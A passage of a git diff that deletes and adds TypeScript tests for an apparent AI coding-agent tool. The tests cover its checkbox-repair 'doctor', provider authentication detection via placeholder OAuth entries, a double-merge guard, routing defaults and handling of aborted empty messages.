-    writeFileSync(join(s, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    const planContent = readFileSync(join(m, "slices", "S01", "S01-PLAN.md"), "utf8");
-    assert.ok(planContent.includes("  - [x] **T01"), "indented task checkbox should be marked done");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:task — still fixes task-level bookkeeping (checkbox marking)", async () => {
-  const tmp = makeTmp("task-checkbox");
-  try {
-    const gsd = join(tmp, ".gsd");
-    const m = join(gsd, "milestones", "M001");
-    const s = join(m, "slices", "S01", "tasks");
-    mkdirSync(s, { recursive: true });
-
-    writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo text
-`);
-
-    // Task NOT checked in plan but has a summary — doctor should mark it done
-    writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [ ] **T01: Do stuff** \`est:5m\`
-`);
-
-    writeFileSync(join(s, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Should have fixed the task checkbox
-    const planContent = readFileSync(join(m, "slices", "S01", "S01-PLAN.md"), "utf8");
-    assert.ok(planContent.includes("- [x] **T01"), "should have marked T01 done in plan");
-
-    // Should NOT have touched slice-level completion
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(!existsSync(sliceSummaryPath), "should NOT have created summary stub");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
diff --git a/src/resources/extensions/gsd/tests/doctor-providers.test.ts b/src/resources/extensions/gsd/tests/doctor-providers.test.ts
index c27d92e17..8df31fc10 100644
--- a/src/resources/extensions/gsd/tests/doctor-providers.test.ts
+++ b/src/resources/extensions/gsd/tests/doctor-providers.test.ts
@@ -419,7 +419,7 @@ test("runProviderChecks uses provider-qualified anthropic-vertex model IDs", ()
   const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-vertex-prefix-repo-")));
   mkdirSync(join(repo, ".gsd"), { recursive: true });
   writeFileSync(
-    join(repo, ".gsd", "preferences.md"),
+    join(repo, ".gsd", "PREFERENCES.md"),
     [
       "---",
       "models:",
@@ -454,7 +454,7 @@ test("runProviderChecks uses object provider field for anthropic-vertex models",
   const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-vertex-provider-repo-")));
   mkdirSync(join(repo, ".gsd"), { recursive: true });
   writeFileSync(
-    join(repo, ".gsd", "preferences.md"),
+    join(repo, ".gsd", "PREFERENCES.md"),
     [
       "---",
       "models:",
@@ -484,3 +484,120 @@ test("runProviderChecks uses object provider field for anthropic-vertex models",
   rmSync(repo, { recursive: true, force: true });
   rmSync(tmpHome, { recursive: true, force: true });
 });
+
+// ─── Cross-provider routing: Codex & Gemini CLI (#2922) ────────────────────
+
+test("runProviderChecks reports ok for Google via google-gemini-cli auth.json (#2922)", () => {
+  const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-gemini-cli-repo-")));
+  mkdirSync(join(repo, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(repo, ".gsd", "PREFERENCES.md"),
+    [
+      "---",
+      "models:",
+      "  execution: gemini-2.5-pro",
+      "---",
+      "",
+    ].join("\n"),
+  );
+
+  const tmpHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-gemini-cli-home-")));
+  const agentDir = join(tmpHome, ".gsd", "agent");
+  mkdirSync(agentDir, { recursive: true });
+
+  // google-gemini-cli OAuth in auth.json (no google API key)
+  const authData = {
+    "google-gemini-cli": { type: "oauth", apiKey: "ya29.gemini-cli-token", expires: Date.now() + 3_600_000 },
+  };
+  writeFileSync(join(agentDir, "auth.json"), JSON.stringify(authData));
+
+  withEnv({
+    HOME: tmpHome,
+    GEMINI_API_KEY: undefined,
+    GOOGLE_API_KEY: undefined,
+  }, () => {
+    withCwd(repo, () => {
+      const results = runProviderChecks();
+      const google = results.find(r => r.name === "google");
+      assert.ok(google, "google result should exist");
+      assert.equal(google!.status, "ok", "should be ok when google-gemini-cli auth is available (#2922)");
+      assert.ok(google!.message.includes("Google Gemini CLI"), "should mention Gemini CLI as the source (#2922)");
+    });
+  });
+
+  rmSync(repo, { recursive: true, force: true });
+  rmSync(tmpHome, { recursive: true, force: true });
+});
+
+test("runProviderChecks reports ok for OpenAI via openai-codex auth.json (#2922)", () => {
+  const repo = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-codex-repo-")));
+  mkdirSync(join(repo, ".gsd"), { recursive: true });
+  writeFileSync(
+    join(repo, ".gsd", "PREFERENCES.md"),
+    [
+      "---",
+      "models:",
+      "  execution: gpt-4o",
+      "---",
+      "",
+    ].join("\n"),
+  );
+
+  const tmpHome = realpathSync(mkdtempSync(join(tmpdir(), "gsd-providers-codex-home-")));
+  const agentDir = join(tmpHome, ".gsd", "agent");
+  mkdirSync(agentDir, { recursive: true });
+
+  // openai-codex OAuth in auth.json (no openai API key)
+  const authData = {
+    "openai-codex": { type: "oauth", apiKey: "codex-token", expires: Date.now() + 3_600_000 },
+  };
+  writeFileSync(join(agentDir, "auth.json"), JSON.stringify(authData));
+
+  withEnv({
+    HOME: tmpHome,
+    OPENAI_API_KEY: undefined,
+    // Clear Copilot env vars so it doesn't route through Copilot
+    COPILOT_GITHUB_TOKEN: undefined,
+    GH_TOKEN: undefined,
+    GITHUB_TOKEN: undefined,
+  }, () => {
+    withCwd(repo, () => {
+      const results = runProviderChecks();
+      const openai = results.find(r => r.name === "openai");
+      assert.ok(openai, "openai result should exist");
+      assert.equal(openai!.status, "ok", "should be ok when openai-codex auth is available (#2922)");
+      assert.ok(openai!.message.includes("Codex"), "should mention Codex as the source (#2922)");
+    });
+  });
+
+  rmSync(repo, { recursive: true, force: true });
+  rmSync(tmpHome, { recursive: true, force: true });
+});
+
+test("PROVIDER_ROUTES includes google-gemini-cli as route for google (#2922)", async () => {
+  const { readFileSync: readFS } = await import("node:fs");
+  const { dirname: dirn, join: joinPath } = await import("node:path");
+  const { fileURLToPath: fileUrl } = await import("node:url");
+  const __dir = dirn(fileUrl(import.meta.url));
+  const src = readFS(joinPath(__dir, "..", "doctor-providers.ts"), "utf-8");
+
+  // PROVIDER_ROUTES must map google -> [..., "google-gemini-cli"]
+  assert.ok(
+    src.includes('"google-gemini-cli"'),
+    'PROVIDER_ROUTES must include "google-gemini-cli" as a route (#2922)',
+  );
+});
+
+test("PROVIDER_ROUTES includes openai-codex as route for openai (#2922)", async () => {
+  const { readFileSync: readFS } = await import("node:fs");
+  const { dirname: dirn, join: joinPath } = await import("node:path");
+  const { fileURLToPath: fileUrl } = await import("node:url");
+  const __dir = dirn(fileUrl(import.meta.url));
+  const src = readFS(joinPath(__dir, "..", "doctor-providers.ts"), "utf-8");
+
+  // PROVIDER_ROUTES must map openai -> [..., "openai-codex"]
+  assert.ok(
+    src.includes('"openai-codex"'),
+    'PROVIDER_ROUTES must include "openai-codex" as a route (#2922)',
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/doctor-roadmap-summary-atomicity.test.ts b/src/resources/extensions/gsd/tests/doctor-roadmap-summary-atomicity.test.ts
deleted file mode 100644
index 63cbee5cd..000000000
--- a/src/resources/extensions/gsd/tests/doctor-roadmap-summary-atomicity.test.ts
+++ /dev/null
@@ -1,167 +0,0 @@
-/**
- * Regression test for #1910: Doctor marks roadmap checkbox at fixLevel="task"
- * without summary on disk, causing deriveState() to skip complete-slice and
- * hard-stop at validating-milestone.
- *
- * The roadmap checkbox must only be marked when the slice summary actually
- * exists on disk (either pre-existing or created in the current doctor run).
- * At fixLevel="task", the summary is deferred (COMPLETION_TRANSITION_CODES),
- * so the roadmap checkbox must also be deferred.
- */
-
-import { mkdirSync, writeFileSync, rmSync, readFileSync, existsSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-import test from "node:test";
-import assert from "node:assert/strict";
-import { runGSDDoctor } from "../doctor.ts";
-
-function makeTmp(name: string): string {
-  const dir = join(tmpdir(), `doctor-roadmap-summary-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
-  mkdirSync(dir, { recursive: true });
-  return dir;
-}
-
-/**
- * Build a minimal .gsd structure: milestone with one slice, one task
- * marked done with a summary — but no slice summary and roadmap unchecked.
- * This is the state after the last task completes.
- */
-function buildScaffold(base: string) {
-  const gsd = join(base, ".gsd");
-  const m = join(gsd, "milestones", "M001");
-  const s = join(m, "slices", "S01", "tasks");
-  mkdirSync(s, { recursive: true });
-
-  writeFileSync(join(m, "M001-ROADMAP.md"), `# M001: Test
-
-## Slices
-
-- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
-  > Demo text
-`);
-
-  writeFileSync(join(m, "slices", "S01", "S01-PLAN.md"), `# S01: Test Slice
-
-**Goal:** test
-
-## Tasks
-
-- [x] **T01: Do stuff** \`est:5m\`
-`);
-
-  writeFileSync(join(s, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
-duration: 5m
-verification_result: passed
-completed_at: 2026-01-01
----
-
-# T01: Do stuff
-
-Done.
-`);
-}
-
-test("fixLevel:task — must NOT mark roadmap checkbox when summary does not exist on disk (#1910)", async () => {
-  const tmp = makeTmp("no-roadmap-without-summary");
-  try {
-    buildScaffold(tmp);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Doctor should detect both issues
-    const codes = report.issues.map(i => i.code);
-    assert.ok(codes.includes("all_tasks_done_missing_slice_summary"), "should detect missing summary");
-    assert.ok(codes.includes("all_tasks_done_roadmap_not_checked"), "should detect unchecked roadmap");
-
-    // Summary should NOT exist (deferred at task level)
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(!existsSync(sliceSummaryPath), "summary should NOT be created (deferred)");
-
-    // CRITICAL: Roadmap checkbox must NOT be checked without summary on disk.
-    // If it is checked, deriveState() sees the milestone as complete and skips
-    // the summarizing phase, causing a hard-stop at validating-milestone.
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(
-      roadmapContent.includes("- [ ] **S01"),
-      "roadmap must NOT mark S01 as checked when summary does not exist on disk"
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:task — consecutive runs must not produce slice_checked_missing_summary (#1910)", async () => {
-  const tmp = makeTmp("no-cascade-error");
-  try {
-    buildScaffold(tmp);
-
-    // First doctor run at task level
-    await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Second doctor run — if the first run incorrectly checked the roadmap,
-    // this run would detect slice_checked_missing_summary (the cascade error
-    // described in the issue's forensic evidence).
-    const report2 = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-    const codes2 = report2.issues.map(i => i.code);
-
-    assert.ok(
-      !codes2.includes("slice_checked_missing_summary"),
-      "must not produce slice_checked_missing_summary — roadmap should not have been checked without summary"
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:all — roadmap checkbox IS marked because summary is created in same run (#1910)", async () => {
-  const tmp = makeTmp("all-level-creates-both");
-  try {
-    buildScaffold(tmp);
-
-    const report = await runGSDDoctor(tmp, { fix: true });
-
-    // At fixLevel:all, summary stub is created first, then roadmap is checked.
-    // Both should be fixed.
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    assert.ok(existsSync(sliceSummaryPath), "summary should be created at fixLevel:all");
-
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(roadmapContent.includes("- [x] **S01"), "roadmap should show S01 as checked at fixLevel:all");
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
-
-test("fixLevel:task — roadmap IS marked when summary already exists on disk (#1910)", async () => {
-  const tmp = makeTmp("summary-preexists");
-  try {
-    buildScaffold(tmp);
-
-    // Pre-create the slice summary (as if complete-slice already ran)
-    const sliceSummaryPath = join(tmp, ".gsd", "milestones", "M001", "slices", "S01", "S01-SUMMARY.md");
-    writeFileSync(sliceSummaryPath, `---
-id: S01
-milestone: M001
----
-
-# S01: Test Slice
-
-Summary content.
-`);
-
-    const report = await runGSDDoctor(tmp, { fix: true, fixLevel: "task" });
-
-    // Summary exists, so roadmap SHOULD be checked even at task level
-    const roadmapContent = readFileSync(join(tmp, ".gsd", "milestones", "M001", "M001-ROADMAP.md"), "utf8");
-    assert.ok(
-      roadmapContent.includes("- [x] **S01"),
-      "roadmap should be checked when summary already exists on disk"
-    );
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
-});
diff --git a/src/resources/extensions/gsd/tests/doctor-task-done-missing-summary-slice-loop.test.ts b/src/resources/extensions/gsd/tests/doctor-task-done-missing-summary-slice-loop.test.ts
deleted file mode 100644
index 102cd8f1e..000000000
--- a/src/resources/extensions/gsd/tests/doctor-task-done-missing-summary-slice-loop.test.ts
+++ /dev/null
@@ -1,174 +0,0 @@
-/**
- * Regression test for #1850: doctor task_done_missing_summary fix leaves
- * slice [x] done in roadmap, causing an infinite doctor loop.
- *
- * Scenario: A slice is [x] done in the roadmap, has S01-SUMMARY.md (so
- * slice_checked_missing_summary never fires), but tasks are [x] done with
- * no T##-SUMMARY.md files. Doctor unchecks the tasks but must also uncheck
- * the slice so the state machine re-enters the executing phase.
- */
-import { mkdtempSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
-import { join } from "node:path";
-import { tmpdir } from "node:os";
-
-import { runGSDDoctor } from "../doctor.js";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
-
-async function main(): Promise<void> {
-  // ─── Setup: slice [x] done with S01-SUMMARY.md, tasks [x] but NO task summaries ───
-  console.log("\n=== #1850: task_done_missing_summary fix must also uncheck slice ===");
-  {
-    const base = mkdtempSync(join(tmpdir(), "gsd-doctor-1850-"));
-    const gsd = join(base, ".gsd");
-    const mDir = join(gsd, "milestones", "M001");
-    const sDir = join(mDir, "slices", "S01");
-    const tDir = join(sDir, "tasks");
-    mkdirSync(tDir, { recursive: true });
-
-    // Roadmap: slice is [x] done
-    writeFileSync(join(mDir, "M001-ROADMAP.md"), `# M001: Test Milestone
-
-## Slices
-- [x] **S01: Guided Slice** \`risk:low\` \`depends:[]\`
-  > After this: guided flow works
-`);
-
-    // Plan: tasks are [x] done
-    writeFileSync(join(sDir, "S01-PLAN.md"), `# S01: Guided Slice
-
-**Goal:** Test guided flow
-**Demo:** Works
-
-## Tasks
-- [x] **T01: First task** \`est:10m\`
-  Do the first thing.
-- [x] **T02: Second task** \`est:10m\`
-  Do the second thing.
-- [x] **T03: Third task** \`est:10m\`
-  Do the third thing.
-`);
-
-    // Slice summary EXISTS (so slice_checked_missing_summary guard does NOT fire)
-    writeFileSync(join(sDir, "S01-SUMMARY.md"), `---
-id: S01
-parent: M001
----
-# S01: Guided Slice
-Done via guided flow.
-`);
-
-    // Slice UAT exists
-    writeFileSync(join(sDir, "S01-UAT.md"), `# S01 UAT
-Verified.
-`);
-
-    // NO task summaries on disk — this is the trigger condition
-
-    // ── First pass: diagnose ──
-    const diagReport = await runGSDDoctor(base, { fix: false });
-    const taskDoneMissing = diagReport.issues.filter(i => i.code === "task_done_missing_summary");
-    assertEq(taskDoneMissing.length, 3, "detects 3 tasks with task_done_missing_summary");
-
-    // ── Second pass: fix ──
-    const fixReport = await runGSDDoctor(base, { fix: true });
-
-    // Tasks should be unchecked in plan
-    const plan = readFileSync(join(sDir, "S01-PLAN.md"), "utf-8");
-    assertTrue(plan.includes("- [ ] **T01:"), "T01 is unchecked in plan after fix");
-    assertTrue(plan.includes("- [ ] **T02:"), "T02 is unchecked in plan after fix");
-    assertTrue(plan.includes("- [ ] **T03:"), "T03 is unchecked in plan after fix");
-
-    // CRITICAL: Slice must also be unchecked in roadmap to prevent infinite loop
-    const roadmap = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
-    assertTrue(
-      roadmap.includes("- [ ] **S01:"),
-      "slice is unchecked in roadmap after task_done_missing_summary fix (prevents infinite loop)"
-    );
-    assertTrue(
-      !roadmap.includes("- [x] **S01:"),
-      "slice is NOT still [x] done in roadmap"
-    );
-
-    // ── Third pass: re-run doctor should NOT re-detect task_done_missing_summary ──
-    const rerunReport = await runGSDDoctor(base, { fix: false });
-    const rerunTaskDone = rerunReport.issues.filter(i => i.code === "task_done_missing_summary");
-    assertEq(rerunTaskDone.length, 0, "no task_done_missing_summary on re-run (no infinite loop)");
-
-    rmSync(base, { recursive: true, force: true });
-  }
-
-  // ─── Partial fix: only some tasks missing summaries ───
-  console.log("\n=== #1850: partial — some tasks have summaries, some do not ===");
-  {
-    const base = mkdtempSync(join(tmpdir(), "gsd-doctor-1850-partial-"));
-    const gsd = join(base, ".gsd");
-    const mDir = join(gsd, "milestones", "M001");
-    const sDir = join(mDir, "slices", "S01");
-    const tDir = join(sDir, "tasks");
-    mkdirSync(tDir, { recursive: true });
-
-    writeFileSync(join(mDir, "M001-ROADMAP.md"), `# M001: Test Milestone
-
-## Slices
-- [x] **S01: Partial Slice** \`risk:low\` \`depends:[]\`
-  > After this: partial
-`);
-
-    writeFileSync(join(sDir, "S01-PLAN.md"), `# S01: Partial Slice
-
-**Goal:** Test partial
-**Demo:** Works
-
-## Tasks
-- [x] **T01: Has summary** \`est:10m\`
-  This task has a summary.
-- [x] **T02: Missing summary** \`est:10m\`
-  This task does not.
-`);
-
-    // T01 has a summary, T02 does not
-    writeFileSync(join(tDir, "T01-SUMMARY.md"), `---
-id: T01
-parent: S01
-milestone: M001
----
-# T01: Has summary
-**Done**
-## What Happened
-Done.
-`);
-
-    writeFileSync(join(sDir, "S01-SUMMARY.md"), `---
-id: S01
-parent: M001
----
-# S01: Partial
-`);
-
-    writeFileSync(join(sDir, "S01-UAT.md"), `# S01 UAT
-Done.
-`);
-
-    const fixReport = await runGSDDoctor(base, { fix: true });
-
-    // T02 should be unchecked, T01 should stay checked
-    const plan = readFileSync(join(sDir, "S01-PLAN.md"), "utf-8");
-    assertTrue(plan.includes("- [x] **T01:"), "T01 stays checked (has summary)");
-    assertTrue(plan.includes("- [ ] **T02:"), "T02 is unchecked (missing summary)");
-
-    // Slice must be unchecked because not all tasks are done anymore
-    const roadmap = readFileSync(join(mDir, "M001-ROADMAP.md"), "utf-8");
-    assertTrue(
-      roadmap.includes("- [ ] **S01:"),
-      "slice is unchecked when any task is unchecked by task_done_missing_summary"
-    );
-
-    rmSync(base, { recursive: true, force: true });
-  }
-
-  report();
-}
-
-main();
diff --git a/src/resources/extensions/gsd/tests/double-merge-guard.test.ts b/src/resources/extensions/gsd/tests/double-merge-guard.test.ts
new file mode 100644
index 000000000..ccc9385fc
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/double-merge-guard.test.ts
@@ -0,0 +1,97 @@
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+import { AutoSession } from "../auto/session.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+
+describe("double mergeAndExit guard (#2645)", () => {
+  test("phases.ts sets milestoneMergedInPhases after mergeAndExit in milestone-complete path", () => {
+    // Source audit: the "complete" phase path must set the guard flag
+    // after calling mergeAndExit so that stopAuto skips the second merge.
+    const phasesSrc = readFileSync(
+      join(__dirname, "..", "auto", "phases.ts"),
+      "utf-8",
+    );
+
+    // Find the "complete" phase block
+    const completeIdx = phasesSrc.indexOf('state.phase === "complete"');
+    assert.ok(completeIdx > 0, "phases.ts should have a 'complete' phase check");
+
+    const afterComplete = phasesSrc.slice(completeIdx, completeIdx + 600);
+    const mergeIdx = afterComplete.indexOf("deps.resolver.mergeAndExit");
+    const flagIdx = afterComplete.indexOf("s.milestoneMergedInPhases = true");
+
+    assert.ok(mergeIdx > 0, "complete path should call mergeAndExit");
+    assert.ok(flagIdx > 0, "complete path should set milestoneMergedInPhases");
+    assert.ok(
+      flagIdx > mergeIdx,
+      "milestoneMergedInPhases must be set AFTER mergeAndExit (not before)",
+    );
+  });
+
+  test("phases.ts sets milestoneMergedInPhases after mergeAndExit in all-milestones-complete path", () => {
+    const phasesSrc = readFileSync(
+      join(__dirname, "..", "auto", "phases.ts"),
+      "utf-8",
+    );
+
+    // The "all milestones complete" block checks incomplete.length === 0
+    const allCompleteIdx = phasesSrc.indexOf("incomplete.length === 0");
+    assert.ok(allCompleteIdx > 0, "phases.ts should have an all-milestones-complete check");
+
+    const afterAllComplete = phasesSrc.slice(allCompleteIdx, allCompleteIdx + 600);
+    const mergeIdx = afterAllComplete.indexOf("deps.resolver.mergeAndExit");
+    const flagIdx = afterAllComplete.indexOf("s.milestoneMergedInPhases = true");
+
+    assert.ok(mergeIdx > 0, "all-complete path should call mergeAndExit");
+    assert.ok(flagIdx > 0, "all-complete path should set milestoneMergedInPhases");
+    assert.ok(
+      flagIdx > mergeIdx,
+      "milestoneMergedInPhases must be set AFTER mergeAndExit (not before)",
+    );
+  });
+
+  test("stopAuto checks milestoneMergedInPhases before calling mergeAndExit", () => {
+    const autoSrc = readFileSync(
+      join(__dirname, "..", "auto.ts"),
+      "utf-8",
+    );
+
+    // The Step 4 worktree exit block must check the guard flag
+    const step4Idx = autoSrc.indexOf("Step 4: Auto-worktree exit");
+    assert.ok(step4Idx > 0, "auto.ts should have Step 4 worktree exit");
+
+    const step4Block = autoSrc.slice(step4Idx, step4Idx + 600);
+    assert.ok(
+      step4Block.includes("milestoneMergedInPhases"),
+      "stopAuto Step 4 must check milestoneMergedInPhases before merging",
+    );
+    assert.ok(
+      step4Block.includes("!s.milestoneMergedInPhases"),
+      "stopAuto should skip merge when milestoneMergedInPhases is true",
+    );
+  });
+
+  test("AutoSession.milestoneMergedInPhases defaults to false", () => {
+    const session = new AutoSession();
+    assert.equal(
+      session.milestoneMergedInPhases,
+      false,
+      "new session should have milestoneMergedInPhases = false",
+    );
+  });
+
+  test("AutoSession.reset() clears milestoneMergedInPhases", () => {
+    const session = new AutoSession();
+    session.milestoneMergedInPhases = true;
+    session.reset();
+    assert.equal(
+      session.milestoneMergedInPhases,
+      false,
+      "reset() should clear milestoneMergedInPhases back to false",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/dynamic-routing-default.test.ts b/src/resources/extensions/gsd/tests/dynamic-routing-default.test.ts
new file mode 100644
index 000000000..f3cd15300
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/dynamic-routing-default.test.ts
@@ -0,0 +1,20 @@
+/**
+ * Dynamic routing default — verifies routing is enabled by default.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { defaultRoutingConfig } from "../model-router.js";
+
+test("defaultRoutingConfig returns enabled: true", () => {
+  const config = defaultRoutingConfig();
+  assert.equal(config.enabled, true, "dynamic routing should be enabled by default");
+});
+
+test("defaultRoutingConfig enables all routing features", () => {
+  const config = defaultRoutingConfig();
+  assert.equal(config.escalate_on_failure, true);
+  assert.equal(config.budget_pressure, true);
+  assert.equal(config.cross_provider, true);
+  assert.equal(config.hooks, true);
+});
diff --git a/src/resources/extensions/gsd/tests/empty-content-abort-loop.test.ts b/src/resources/extensions/gsd/tests/empty-content-abort-loop.test.ts
new file mode 100644
index 000000000..eb874c67f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/empty-content-abort-loop.test.ts
@@ -0,0 +1,74 @@
+/**
+ * empty-content-abort-loop.test.ts — Regression test for #2695.
+ *
+ * When the LLM sends an assistant message with empty `content: []` and
+ * `stopReason: "aborted"`, this is NOT a fatal abort — it is a non-fatal
+ * end-of-turn. The abort handler in agent-end-recovery.ts must distinguish
+ * this case and NOT pause auto-mode, allowing the loop to continue via
+ * resolveAgentEnd instead of entering a stuck re-dispatch loop.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const RECOVERY_PATH = join(__dirname, "..", "bootstrap", "agent-end-recovery.ts");
+
+function getRecoverySource(): string {
+  return readFileSync(RECOVERY_PATH, "utf-8");
+}
+
+test("agent-end-recovery.ts does not pause on aborted messages with empty content (#2695)", () => {
+  const source = getRecoverySource();
+
+  // The abort handler at `stopReason === "aborted"` must check for empty content
+  // before deciding to pause. An empty content array is a non-fatal agent stop.
+  const abortIdx = source.indexOf('stopReason === "aborted"');
+  assert.ok(abortIdx > -1, "abort handler must exist in agent-end-recovery.ts");
+
+  // Extract the region around the abort handler (enough to see the guard logic)
+  const abortRegion = source.slice(Math.max(0, abortIdx - 200), abortIdx + 600);
+
+  // Must check for empty content before pausing
+  assert.ok(
+    abortRegion.includes("content") && (abortRegion.includes("length") || abortRegion.includes("?.length")),
+    "abort handler must inspect content array length to distinguish empty-content aborts from fatal aborts (#2695)",
+  );
+});
+
+test("agent-end-recovery.ts routes empty-content aborted messages to resolveAgentEnd (#2695)", () => {
+  const source = getRecoverySource();
+
+  // The abort block must have a path that calls resolveAgentEnd for empty-content messages
+  // instead of unconditionally calling pauseAuto
+  const abortIdx = source.indexOf('stopReason === "aborted"');
+  assert.ok(abortIdx > -1, "abort handler must exist");
+
+  // Get the full abort handling block (from the if to the next stopReason check or success path)
+  const afterAbort = source.slice(abortIdx, abortIdx + 800);
+
+  // The abort block must have a code path that calls resolveAgentEnd (for empty-content case)
+  assert.ok(
+    afterAbort.includes("resolveAgentEnd"),
+    "abort handler must route empty-content aborted messages to resolveAgentEnd instead of always pausing (#2695)",
+  );
+});
+
+test("agent-end-recovery.ts checks for errorMessage presence in abort handler (#2695)", () => {
+  const source = getRecoverySource();
+
+  const abortIdx = source.indexOf('stopReason === "aborted"');
+  assert.ok(abortIdx > -1, "abort handler must exist");
+
+  const abortRegion = source.slice(abortIdx, abortIdx + 600);
+
+  // Fatal aborts should have error context (errorMessage field).
+  // The handler should check for this to distinguish fatal from non-fatal aborts.
+  assert.ok(
+    abortRegion.includes("errorMessage"),
+    "abort handler must check for errorMessage to distinguish fatal aborts from empty-content non-fatal stops (#2695)",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/enhanced-verification-integration.test.ts b/src/resources/extensions/gsd/tests/enhanced-verification-integration.test.ts
new file mode 100644
index 000000000..eb60fb166
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/enhanced-verification-integration.test.ts
@@ -0,0 +1,526 @@
+/**
+ * enhanced-verification-integration.test.ts — Integration tests for enhanced verification.
+ *
+ * Exercises all 7 enhanced verification checks against GSD-2's actual source files.
+ * This proves:
+ *   - R012: No false positives on production code
+ *   - R013: Speed targets met (<2000ms pre-execution, <1000ms post-execution per task)
+ *
+ * The test constructs realistic TaskRow fixtures that reference real GSD source files,
+ * then runs both pre-execution and post-execution checks against them.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { existsSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+import {
+  runPreExecutionChecks,
+  type PreExecutionResult,
+} from "../pre-execution-checks.ts";
+import {
+  runPostExecutionChecks,
+  type PostExecutionResult,
+} from "../post-execution-checks.ts";
+import type { TaskRow } from "../gsd-db.ts";
+
+// ─── Constants ───────────────────────────────────────────────────────────────
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+// Path to the GSD extension source directory (relative to test file)
+const GSD_SRC_DIR = join(__dirname, "..");
+
+// Speed targets from R013
+const PRE_EXECUTION_TIMEOUT_MS = 2000;
+const POST_EXECUTION_TIMEOUT_MS = 1000;
+
+// ─── Test Fixtures ───────────────────────────────────────────────────────────
+
+/**
+ * Create a minimal TaskRow for testing.
+ */
+function createTask(overrides: Partial<TaskRow> = {}): TaskRow {
+  return {
+    milestone_id: "M001",
+    slice_id: "S01",
+    id: overrides.id ?? "T01",
+    title: overrides.title ?? "Test Task",
+    status: overrides.status ?? "pending",
+    one_liner: "",
+    narrative: "",
+    verification_result: "",
+    duration: "",
+    completed_at: overrides.status === "complete" ? new Date().toISOString() : null,
+    blocker_discovered: false,
+    deviations: "",
+    known_issues: "",
+    key_files: overrides.key_files ?? [],
+    key_decisions: [],
+    full_summary_md: "",
+    description: overrides.description ?? "",
+    estimate: "",
+    files: overrides.files ?? [],
+    verify: "",
+    inputs: overrides.inputs ?? [],
+    expected_output: overrides.expected_output ?? [],
+    observability_impact: "",
+    full_plan_md: "",
+    sequence: overrides.sequence ?? 0,
+    ...overrides,
+  };
+}
+
+// ─── Real GSD Source Files for Testing ───────────────────────────────────────
+
+// These are actual GSD extension source files that exist in the codebase
+const REAL_GSD_FILES = [
+  "gsd-db.ts",
+  "auto-verification.ts",
+  "pre-execution-checks.ts",
+  "post-execution-checks.ts",
+  "state.ts",
+  "errors.ts",
+  "types.ts",
+  "cache.ts",
+  "atomic-write.ts",
+];
+
+// Verify the test fixture files actually exist
+function verifyTestFixturesExist(): void {
